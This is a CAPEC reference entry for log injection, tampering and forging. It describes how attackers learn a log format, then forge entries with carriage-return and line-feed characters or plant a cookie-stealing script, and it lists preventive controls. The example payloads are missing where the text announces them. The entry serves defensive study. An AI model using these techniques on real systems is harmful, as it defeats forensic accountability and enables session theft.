CAPEC-93 - Log Injection-Tampering-Forging

This attack targets the log files of the target host. The attacker injects, manipulates or forges malicious log entries in the log file, allowing him to mislead a log audit, cover traces of attack, or perform other malicious actions. The target host is not properly controlling log access. As a result tainted data is resulting in the log files leading to a failure in accountability, non-repudiation and incident forensics capability.

Severity

Likelihood

Confidentiality

Integrity

Availability

  • Attack Methods 3
  • Analysis
  • Modification of Resources
  • Injection
  • Purposes 1
  • Obfuscation
  • Sec Principles 1
  • Reluctance to Trust
  • Scopes 1
  • Modify application data
  • Integrity

Low level: This attack can be as simple as adding extra characters to the logged data (e.g. username). Adding entries is typically easier than removing entries.

Medium level: A more sophisticated attack can try to defeat the input validation mechanism.

The target host is logging the action and data of the user.

The target host insufficiently protects access to the logs or logging mechanisms.

The attacker will try to determine which data may be logged in case of a success or failure of a predetermined action such as authentication. Once that data has been identified, the attacker may try to craft malicious data to inject.

Vulnerability testing tool can be used to test the input validation mechanism.

Step 1 - Determine Application's Log File Format

The first step is exploratory meaning the attacker observes the system. The attacker looks for action and data that are likely to be logged. The attacker may be familiar with the log format of the system..

Tecnique ID: 1 - Environment(s) env-All

Determine logging utility being used by application (e.g. log4j)

Tecnique ID: 2 - Environment(s) env-All

Gain access to application's source code to determine log file formats.

Tecnique ID: 3 - Environment(s) env-All

Install or obtain access to instance of application and observe its log file format.

Outcome ID: 1

Type: Success

Attacker determines log file format used by application.

Outcome ID: 2

Type: Inconclusive

Attacker cannot conclusively determine log file format; he/she can only guess what the format is.



Step 1 - Manipulate Log Files

The attacker alters the log contents either directly through manipulation or forging or indirectly through injection of specially crafted input that the target software will write to the logs. This type of attack typically follows another attack and is used to try to cover the traces of the previous attack..

Tecnique ID: 1 - Environment(s) env-All

Use carriage return and/or line feed characters to start a new line in the log file, and then, add a fake entry. For example:

Tecnique ID: 2 - Environment(s) env-All

Insert a script into the log file such that if it is viewed using a web browser, the attacker will get a copy of the operator/administrator's cookie and will be able to gain access as that user. For example, a log file entry could contain

Security Control ID: 1

Type: Preventative

Input validation to ensure that only legal characters supplied by users can be entered into log files

Security Control ID: 2

Type: Preventative

Encode information from user such that any unexpected characters are encoded safely before they are entered into log files.

Security Control ID: 3

Type: Preventative

Post-processing of log files to remove or encode dangerous characters before displaying to a user may help in some cases. It will not help remove fake log entries entered using carriage return and line feed characters, however.


Outcome ID: 1

Type: Success

Forged entry or other malicious data inserted into application's logs.

Outcome ID: 2

Type: Failure

No entry inserted into logs, or the entry is visibly distinguishable from real entries.



Carefully control access to physical log files.

Do not allow tainted data to be written in the log file without prior input validation. Whitelisting may be used to properly validate the data.

Use synchronization to control the flow of execution.

Use static analysis tools to identify log forging vulnerabilities.

Avoid viewing logs with tools that may interpret control characters in the file, such as command-line shells.